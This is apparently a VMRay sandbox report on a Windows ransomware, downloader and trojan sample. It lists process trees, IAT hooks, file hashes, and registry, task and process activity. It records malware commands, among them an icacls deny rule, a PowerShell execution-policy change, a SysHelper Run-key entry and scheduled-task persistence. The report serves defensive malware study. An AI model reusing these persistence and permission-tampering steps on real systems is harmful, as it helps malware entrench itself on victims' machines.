2767c566...af59 | Grouped Behavior
Try VMRay Analyzer
VTI SCORE: 100/100
Dynamic Analysis Report
Classification: Ransomware, Downloader, Trojan

LS_APPDATA744de46e-2913-4f69-a0ea-d12dff2a5c90SAMPLE.exe

Windows Exe (x86-32)

Created at 2019-07-19T06:56:00

Remarks (2/3)

(0x200000e): The overall sleep time of all monitored processes was truncated from "40 seconds" to "10 seconds" to reveal dormant functionality.

(0x2000004): The operating system was rebooted during the analysis because the sample installed a startup script, task or application for persistence.

(0x200003a): 2 tasks were rescheduled ahead of time to reveal dormant functionality.

Monitored Processes

Process Overview
»
ID PID Monitor Reason Integrity Level Image Name Command Line Origin ID
#1 0x8d4 Analysis Target High (Elevated) ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe "C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\LS_APPDATA744de46e-2913-4f69-a0ea-d12dff2a5c90SAMPLE.exe" -
#3 0x994 Child Process High (Elevated) icacls.exe icacls "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\c5878955-7c21-46f7-9950-dbc1d2273e6e" /deny *S-1-1-0:(OI)(CI)(DE,DC) #1
#4 0x50c Created Scheduled Job High (Elevated) taskeng.exe taskeng.exe {0E3013FB-5D32-4499-A940-035C87CD1A3B} S-1-5-21-3388679973-3930757225-3770151564-1000:XDUWTFONO\5p5NrGJn0jS HALPmcxz:Interactive:Highest[1] #1
#5 0x9a4 Child Process High (Elevated) ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe "C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\LS_APPDATA744de46e-2913-4f69-a0ea-d12dff2a5c90SAMPLE.exe" --Admin IsNotAutoStart IsNotTask #1
#6 0xa00 Child Process High (Elevated) updatewin1.exe "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\5f157674-79c2-4ded-9dab-75219d8fb8ff\updatewin1.exe" #5
#7 0xa1c Child Process High (Elevated) updatewin1.exe "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\5f157674-79c2-4ded-9dab-75219d8fb8ff\updatewin1.exe" --Admin #6
#8 0xa24 Child Process High (Elevated) powershell.exe powershell -Command Set-ExecutionPolicy -Scope CurrentUser RemoteSigned #7
#9 0xa40 Child Process High (Elevated) updatewin2.exe "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\5f157674-79c2-4ded-9dab-75219d8fb8ff\updatewin2.exe" #5
#10 0xa5c Child Process High (Elevated) updatewin.exe "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\5f157674-79c2-4ded-9dab-75219d8fb8ff\updatewin.exe" #5
#11 0xaa4 Created Scheduled Job Medium taskeng.exe taskeng.exe {FB1509EA-5700-4FAF-8375-2764FDDD9411} S-1-5-21-3388679973-3930757225-3770151564-1000:XDUWTFONO\5p5NrGJn0jS HALPmcxz:Interactive:LUA[1] #5
#12 0xac4 Child Process Medium ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\c5878955-7c21-46f7-9950-dbc1d2273e6e\LS_APPDATA744de46e-2913-4f69-a0ea-d12dff2a5c90SAMPLE.exe" --Task #11
#16 0x564 Autostart Medium ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\c5878955-7c21-46f7-9950-dbc1d2273e6e\LS_APPDATA744de46e-2913-4f69-a0ea-d12dff2a5c90SAMPLE.exe" --AutoStart -

Behavior Information - Grouped by Category

Process #1: ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe
669 2
»
Information Value
ID #1
File Name c:\users\5p5nrgjn0js halpmcxz\desktop\ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe
Command Line "C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\LS_APPDATA744de46e-2913-4f69-a0ea-d12dff2a5c90SAMPLE.exe"
Initial Working Directory C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\
Monitor Start Time: 00:00:26, Reason: Analysis Target
Unmonitor End Time: 00:00:44, Reason: Self Terminated
Monitor Duration 00:00:18
OS Process Information
»
Information Value
PID 0x8d4
Parent PID 0x45c (c:\windows\explorer.exe)
Bitness 32-bit
Is Created or Modified Executable True
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x 8D8
0x 8E4
0x 8E8
0x 8EC
0x 8F0
0x 8F4
0x 8F8
0x 8FC
0x 900
0x 988
0x 990
0x 9A0
Hook Information
»
Type Installer Target Size Information Actions
IAT private_0x0000000000cf0000:+0x5cfc7 1. entry of ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe 4 bytes advapi32.dll:SetPrivateObjectSecurity+0x0 now points to private_0x000000007fff0000:+0x47c13324
IAT private_0x0000000000cf0000:+0x5cfc7 2. entry of ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe 4 bytes advapi32.dll:PrivilegedServiceAuditAlarmA+0x0 now points to private_0x0000000000050000:+0x21446
IAT private_0x0000000000cf0000:+0x5cfc7 3. entry of ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe 4 bytes advapi32.dll:LockServiceDatabase+0x0 now points to private_0x000000007fff0000:+0x7f6b0000
IAT private_0x0000000000cf0000:+0x5cfc7 7. entry of ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe 4 bytes gdi32.dll:SetMapMode+0x0 now points to pagefile_0x0000000001110000:+0xd70689
IAT private_0x0000000000cf0000:+0x5cfc7 8. entry of ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe 4 bytes gdi32.dll:GetOutlineTextMetricsA+0x0 now points to private_0x000000007fff0000:+0xb00ffad
IAT private_0x0000000000cf0000:+0x5cfc7 12. entry of ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe 4 bytes kernel32.dll:FormatMessageW+0x0 now points to private_0x000000007fff0000:+0x3097589
IAT private_0x0000000000cf0000:+0x5cfc7 13. entry of ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe 4 bytes kernel32.dll:CreateMailslotA+0x0 now points to private_0x000000007fff0000:+0x3eec1cc7
IAT private_0x0000000000cf0000:+0x5cfc7 14. entry of ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe 4 bytes kernel32.dll:lstrlenA+0x0 now points to private_0x000000007fff0000:+0xbed758b
IAT private_0x0000000000cf0000:+0x5cfc7 15. entry of ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe 4 bytes kernel32.dll:GetCurrentDirectoryA+0x0 now points to private_0x000000007fff0000:+0x773c087d
IAT private_0x0000000000cf0000:+0x5cfc7 16. entry of ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe 4 bytes kernel32.dll:CreateFileW+0x0 now points to private_0x000000007fff0000:+0x7f8c0f74
IAT private_0x0000000000cf0000:+0x5cfc7 17. entry of ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe 4 bytes kernel32.dll:GetNumberFormatW+0x0 now points to private_0x000000007fff0000:+0x7ccbe856
IAT private_0x0000000000cf0000:+0x5cfc7 18. entry of ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe 4 bytes kernel32.dll:PeekConsoleInputW+0x0 now points to private_0x000000007fff0000:+0x4684ffff
IAT private_0x0000000000cf0000:+0x5cfc7 19. entry of ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe 4 bytes kernel32.dll:GetTickCount+0x0 now points to rpcrt4.dll:I_RpcBindingInqDynamicEndpointA+0x12f62
IAT private_0x0000000000cf0000:+0x5cfc7 27. entry of ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe 4 bytes kernel32.dll:GetACP+0x0 now points to private_0x000000007fff0000:+0x4ccdccc3
IAT private_0x0000000000cf0000:+0x5cfc7 28. entry of ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe 4 bytes kernel32.dll:IsValidCodePage+0x0 now points to private_0x000000007fff0000:+0x4ccdcccc
IAT private_0x0000000000cf0000:+0x5cfc7 29. entry of ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe 4 bytes kernel32.dll:GetHandleInformation+0x0 now points to private_0x000000007fff0000:+0x3f38b56
IAT private_0x0000000000cf0000:+0x5cfc7 31. entry of ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe 4 bytes kernel32.dll:LockFile+0x0 now points to private_0x000000007fff0000:+0x6837ff0a
IAT private_0x0000000000cf0000:+0x5cfc7 33. entry of ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe 4 bytes kernel32.dll:ExitProcess+0x0 now points to private_0x000000007fff0000:+0x4705c483
IAT private_0x0000000000cf0000:+0x5cfc7 34. entry of ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe 4 bytes kernel32.dll:VirtualProtect+0x0 now points to private_0x0000000000050000:+0x21446
IAT private_0x0000000000cf0000:+0x5cfc7 35. entry of ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe 4 bytes kernel32.dll:GetBinaryTypeA+0x0 now points to private_0x000000007fff0000:+0x40340000
IAT private_0x0000000000cf0000:+0x5cfc7 36. entry of ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe 4 bytes kernel32.dll:GlobalMemoryStatus+0x0 now points to private_0x0000000000090000:+0x746c7
IAT private_0x0000000000cf0000:+0x5cfc7 38. entry of ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe 4 bytes kernel32.dll:OutputDebugStringW+0x0 now points to private_0x000000007fff0000:+0x435f0689
IAT private_0x0000000000cf0000:+0x5cfc7 39. entry of ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe 4 bytes kernel32.dll:GetProcAddress+0x0 now points to private_0x000000007fff0000:+0x4ccdcccc
IAT private_0x0000000000cf0000:+0x5cfc7 40. entry of ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe 4 bytes kernel32.dll:LoadLibraryExW+0x0 now points to private_0x000000007fff0000:+0x4ccdcccc
IAT private_0x0000000000cf0000:+0x5cfc7 41. entry of ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe 4 bytes ntdll.dll:RtlEncodePointer+0x0 now points to private_0x000000007fff0000:+0xbed8b55
IAT private_0x0000000000cf0000:+0x5cfc7 43. entry of ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe 4 bytes kernel32.dll:RaiseException+0x0 now points to private_0x000000007fff0000:+0x78d2012b
IAT private_0x0000000000cf0000:+0x5cfc7 45. entry of ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe 4 bytes kernel32.dll:GetCommandLineW+0x0 now points to private_0x000000007fff0000:+0xbed8b55
IAT private_0x0000000000cf0000:+0x5cfc7 47. entry of ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe 4 bytes kernel32.dll:GetLastError+0x0 now points to private_0x000000007fff0000:+0x425e012b
IAT private_0x0000000000cf0000:+0x5cfc7 48. entry of ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe 4 bytes ntdll.dll:RtlAllocateHeap+0x0 now points to private_0x000000007fff0000:+0x4ccd0004
IAT private_0x0000000000cf0000:+0x5cfc7 49. entry of ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe 4 bytes kernel32.dll:HeapFree+0x0 now points to private_0x000000007fff0000:+0xbed8b55
IAT private_0x0000000000cf0000:+0x5cfc7 51. entry of ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe 4 bytes kernel32.dll:MultiByteToWideChar+0x0 now points to private_0x000000007fff0000:+0x78d2012b
IAT private_0x0000000000cf0000:+0x5cfc7 53. entry of ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe 4 bytes ntdll.dll:RtlSizeHeap+0x0 now points to private_0x000000007fff0000:+0xbed8b55
IAT private_0x0000000000cf0000:+0x5cfc7 55. entry of ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe 4 bytes ntdll.dll:RtlEnterCriticalSection+0x0 now points to private_0x000000007fff0000:+0x425e012b
IAT private_0x0000000000cf0000:+0x5cfc7 56. entry of ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe 4 bytes ntdll.dll:RtlLeaveCriticalSection+0x0 now points to private_0x000000007fff0000:+0x4ccd0004
IAT private_0x0000000000cf0000:+0x5cfc7 58. entry of ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe 4 bytes kernel32.dll:GetConsoleCP+0x0 now points to private_0x000000007fff0000:+0x309758b
IAT private_0x0000000000cf0000:+0x5cfc7 60. entry of ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe 4 bytes kernel32.dll:SetLastError+0x0 now points to private_0x000000007fff0000:+0x6837ff0a
IAT private_0x0000000000cf0000:+0x5cfc7 62. entry of ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe 4 bytes kernel32.dll:GetProcessHeap+0x0 now points to private_0x000000007fff0000:+0x4705c483
IAT private_0x0000000000cf0000:+0x5cfc7 63. entry of ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe 4 bytes kernel32.dll:GetStdHandle+0x0 now points to private_0x0000000000050000:+0x21446
IAT private_0x0000000000cf0000:+0x5cfc7 64. entry of ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe 4 bytes kernel32.dll:GetFileType+0x0 now points to private_0x000000007fff0000:+0x40340000
IAT private_0x0000000000cf0000:+0x5cfc7 65. entry of ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe 4 bytes ntdll.dll:RtlDeleteCriticalSection+0x0 now points to private_0x0000000000090000:+0x746c7
IAT private_0x0000000000cf0000:+0x5cfc7 68. entry of ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe 4 bytes kernel32.dll:QueryPerformanceCounter+0x0 now points to private_0x000000007fff0000:+0x4c0104c2
IAT private_0x0000000000cf0000:+0x5cfc7 69. entry of ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe 4 bytes kernel32.dll:GetCurrentProcessId+0x0 now points to private_0x000000007fff0000:+0xbed8b55
IAT private_0x0000000000cf0000:+0x5cfc7 70. entry of ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe 4 bytes kernel32.dll:GetSystemTimeAsFileTime+0x0 now points to private_0x000000007fff0000:+0x75e9084d
IAT private_0x0000000000cf0000:+0x5cfc7 72. entry of ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe 4 bytes kernel32.dll:FreeEnvironmentStringsW+0x0 now points to private_0x000000007fff0000:+0x4c0104c2
IAT private_0x0000000000cf0000:+0x5cfc7 75. entry of ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe 4 bytes kernel32.dll:InitializeCriticalSectionAndSpinCount+0x0 now points to private_0x000000007fff0000:+0x21650044
IAT private_0x0000000000cf0000:+0x5cfc7 80. entry of ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe 4 bytes kernel32.dll:TlsSetValue+0x0 now points to private_0x000000007fff0000:+0x47f14d89
IAT private_0x0000000000cf0000:+0x5cfc7 82. entry of ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe 4 bytes kernel32.dll:GetModuleHandleW+0x0 now points to private_0x000000007fff0000:+0x49860000
IAT private_0x0000000000cf0000:+0x5cfc7 84. entry of ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe 4 bytes kernel32.dll:GetStringTypeW+0x0 now points to private_0x000000007fff0000:+0x75efe80c
IAT private_0x0000000000cf0000:+0x5cfc7 88. entry of ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe 4 bytes user32.dll:EnumPropsW+0x0 now points to private_0x000000007fff0000:+0x425ee58b
IAT private_0x0000000000cf0000:+0x5cfc7 89. entry of ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe 4 bytes user32.dll:SendMessageA+0x0 now points to private_0x000000007fff0000:+0x4ccd0008
IAT private_0x0000000000cf0000:+0x5cfc7 90. entry of ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe 4 bytes user32.dll:ChangeDisplaySettingsA+0x0 now points to private_0x000000007fff0000:+0x4ccdcccc
IAT private_0x0000000000cf0000:+0x5cfc7 91. entry of ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe 4 bytes user32.dll:LoadStringW+0x0 now points to private_0x000000007fff0000:+0x4ccdcccc
IAT private_0x0000000000cf0000:+0x5cfc7 92. entry of ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe 4 bytes user32.dll:GetClassInfoW+0x0 now points to private_0x000000007fff0000:+0x4ccdcccc
IAT private_0x0000000000cf0000:+0x5cfc7 94. entry of ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe 4 bytes user32.dll:DrawIcon+0x0 now points to private_0x000000007fff0000:+0x309758b
IAT private_0x0000000000cf0000:+0x5cfc7 96. entry of ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe 4 bytes user32.dll:CreateDialogParamW+0x0 now points to private_0x000000007fff0000:+0x6837ff0a
IAT private_0x0000000000cf0000:+0x5cfc7 98. entry of ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe 4 bytes winhttp.dll:WinHttpWriteData+0x0 now points to private_0x000000007fff0000:+0x4705c483
IAT private_0x0000000000cf0000:+0x5cfc7 99. entry of ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe 4 bytes winhttp.dll:WinHttpQueryDataAvailable+0x0 now points to private_0x0000000000090000:+0x61446
Dropped Files
»
Filename File Size Hash Values YARA Match Actions
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\LS_APPDATA744de46e-2913-4f69-a0ea-d12dff2a5c90SAMPLE.exe 387.50 KB MD5: 80d04be9495d2f7e662f4ee50d03f1a2
SHA1: 0bacc428bae7d567f2faaf1f3de896d6f690c098
SHA256: 2767c566c6e7de07b85a910e3598cc8e4aa6655cffe7623ccc7f85f508fcaf59
SSDeep: 6144:YwEGfsyTs+FW1rX9eUYLEspL7DFTsfVLy0yAgHGUCacSl1FDkZF/MQWMQE+poCI7:tEGfHx69fspHp2ePCacStkZgHpvI7
False
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\LS_APPDATA744de46e-2913-4f69-a0ea-d12dff2a5c90SAMPLE.exe 387.58 KB MD5: 91fc5f70c0bed097d53c34cb8a23e756
SHA1: 31308bddb0aae0725e7e8158ba690b5b96b666c5
SHA256: 52a88d7dad4a50498c0190a2a18d896d6515bd66b9c02b73391f035bd3f8bddd
SSDeep: 12288:IPOf6b2G3AFIlrUspHp2ePCacStkZgHpvI7w:IPzAk4sdp2efkypvI7w
False
c:\users\5p5nrgjn0js halpmcxz\appdata\local\microsoft\windows\temporary internet files\content.ie5\x9ohk109\geo[1].json 465 bytes MD5: d6727470681ecc2ca56bbd0486b4fa97
SHA1: 693756ab251ef2d82a91d94a2e5b78a9604d8bac
SHA256: 8b37ae3083eb3bb497d0de9aa0f48e4fa2b893726e2a9787e6dad0ecd40d9613
SSDeep: 12:YCJcjmdVQVCRbwXhCdEVQVPB8yPt0fRbIRAJdxFQVyrhmXoB2SH4:YODQVCRbwxCCQVvV0fRbI2JdxFQVyNm5
False
Modified Files
»
Filename File Size Hash Values YARA Match Actions
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\LS_APPDATA744de46e-2913-4f69-a0ea-d12dff2a5c90SAMPLE.exe 387.58 KB MD5: 91fc5f70c0bed097d53c34cb8a23e756
SHA1: 31308bddb0aae0725e7e8158ba690b5b96b666c5
SHA256: 52a88d7dad4a50498c0190a2a18d896d6515bd66b9c02b73391f035bd3f8bddd
SSDeep: 12288:IPOf6b2G3AFIlrUspHp2ePCacStkZgHpvI7w:IPzAk4sdp2efkypvI7w
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\windows\cookies\index.dat 32.00 KB MD5: 74d69403f4a938faa28298c110bc71c3
SHA1: c016f27979d48a90bb341ccf7ffef41a3955f4d5
SHA256: 8b9d3a6a22778e368c9e81397e2b1af64b9739f7ade535966708f34bcf6eada9
SSDeep: 48:qMhaLouhzppiksLSLWFM+AWi3QTGnbYbQWy58V4l9:qO7appiksLSLaH0QCnMbQ5ll9
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\windows\ietldcache\index.dat 256.00 KB MD5: 6852149628dae385c68c7a9db7028560
SHA1: c6e02c929ec99f984b04876816024c3a39b88ccb
SHA256: 53ae38a5bdbd72f76bf578f6c36e0b54a994003f535dbc1b469c12f3a169e3a4
SSDeep: 384:p8JEJH45Y0z6hKO59HqXRIhHPQ3NGjt3hAJnNH0kHf9QV9wRULzArvCCjgnF5TRy:pTHcEt8jdjFQg2cEbcaaoQARz40LG
False
c:\users\5p5nrgjn0js halpmcxz\appdata\local\microsoft\windows\temporary internet files\content.ie5\index.dat 64.00 KB MD5: 2db89fb48fd886b621627751f2ae15ed
SHA1: e2f78c6a535f4ba230a4470402b6f905f0b4c066
SHA256: dfc9aeb2ad6900a7b836db92a36a9d2162c84551134c0291757cc352206a3166
SSDeep: 384:gnjyLKYBfFVZJptKF2KTFZTCzXTtX+Yih9aX5Jqiq+AN:6OLKYBdVZJptKF2KTFZTCzp++8
False
c:\users\5p5nrgjn0js halpmcxz\appdata\local\microsoft\windows\history\history.ie5\index.dat 64.00 KB MD5: 091194cb61e0a0c2b3c54a1824657f17
SHA1: 67a4b3f9a188580cd4c91506aec26100eb154ff5
SHA256: e54305f7e9bd351ed8c22562f4f5f971f86ba14777467fd5d5f2a743671f5395
SSDeep: 192:5HbDhTtJS8e4S7SVSSdSHS1sSk/S11S1TS1US1sS8LSDS0SdSqSTS1S1HSqhSp8t:5HnhT4WoQYqjVoQS+aYiz7L
False
Host Behavior
COM (8)
»
Operation Class Interface Additional Information Success Count Logfile
Create TaskScheduler ITaskService cls_context = CLSCTX_INPROC_SERVER True 1
Fn
Execute TaskScheduler ITaskService method_name = Connect, server_name = 143, domain = 143, password = 4289035 True 1
Fn
Execute TaskScheduler ITaskService method_name = GetFolder, path = \, new_interface = ITaskFolder True 1
Fn
Execute TaskScheduler ITaskService method_name = NewTask, new_interface = ITaskDefinition True 1
Fn
Execute TaskScheduler ITaskDefinition method_name = get_Triggers, new_interface = ITriggerCollection True 1
Fn
Execute TaskScheduler ITriggerCollection method_name = Create, type = TASK_TRIGGER_TIME, new_interface = IDailyTrigger True 1
Fn
Execute TaskScheduler IDailyTrigger method_name = put_StartBoundary, start_boundary = 2019-07-19T16:58:09 True 1
Fn
Execute TaskScheduler ITaskDefinition method_name = get_Actions, new_interface = IActionCollection True 1
Fn
File (9)
»
Operation Filename Additional Information Success Count Logfile
Create Directory C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\c5878955-7c21-46f7-9950-dbc1d2273e6e - True 1
Fn
Open STD_INPUT_HANDLE - True 2
Fn
Open STD_OUTPUT_HANDLE - True 2
Fn
Open STD_ERROR_HANDLE - True 2
Fn
Copy C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\c5878955-7c21-46f7-9950-dbc1d2273e6e\LS_APPDATA744de46e-2913-4f69-a0ea-d12dff2a5c90SAMPLE.exe source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\LS_APPDATA744de46e-2913-4f69-a0ea-d12dff2a5c90SAMPLE.exe True 1
Fn
Delete C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\c5878955-7c21-46f7-9950-dbc1d2273e6e\LS_APPDATA744de46e-2913-4f69-a0ea-d12dff2a5c90SAMPLE.exe - False 1
Fn
Registry (4)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run - True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run value_name = SysHelper, data = 0, type = REG_NONE False 1
Fn
Write Value HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run value_name = SysHelper, data = "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\c5878955-7c21-46f7-9950-dbc1d2273e6e\LS_APPDATA744de46e-2913-4f69-a0ea-d12dff2a5c90SAMPLE.exe" --AutoStart, size = 302, type = REG_EXPAND_SZ True 1
Fn
Process (48)
»
Operation Process Additional Information Success Count Logfile
Create icacls os_pid = 0x994, creation_flags = CREATE_DETACHED_PROCESS, CREATE_IDLE_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\LS_APPDATA744de46e-2913-4f69-a0ea-d12dff2a5c90SAMPLE.exe show_window = SW_SHOW True 1
Fn
Enumerate Processes - - True 1
Fn
Open System desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\smss.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\csrss.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\wininit.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\csrss.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\winlogon.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\services.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\lsass.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\lsm.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\audiodg.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\dwm.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\windows\explorer.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\windows\system32\spoolsv.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\taskhost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\taskeng.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\windows\system32\taskhost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\program files\microsoft office\messages.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files\windows journal\assistant_lesson_love.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files (x86)\google\recommends.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files\windows portable devices\fitting attachment.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files (x86)\windows media player\garmin.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files\internet explorer\vt-lives.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files (x86)\windows portable devices\gentleman.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files\windows portable devices\lexmark_increases_problems.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files\microsoft synchronization services\accessing.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files (x86)\microsoft analysis services\bottles comics links.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files (x86)\windows portable devices\swissebooks.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
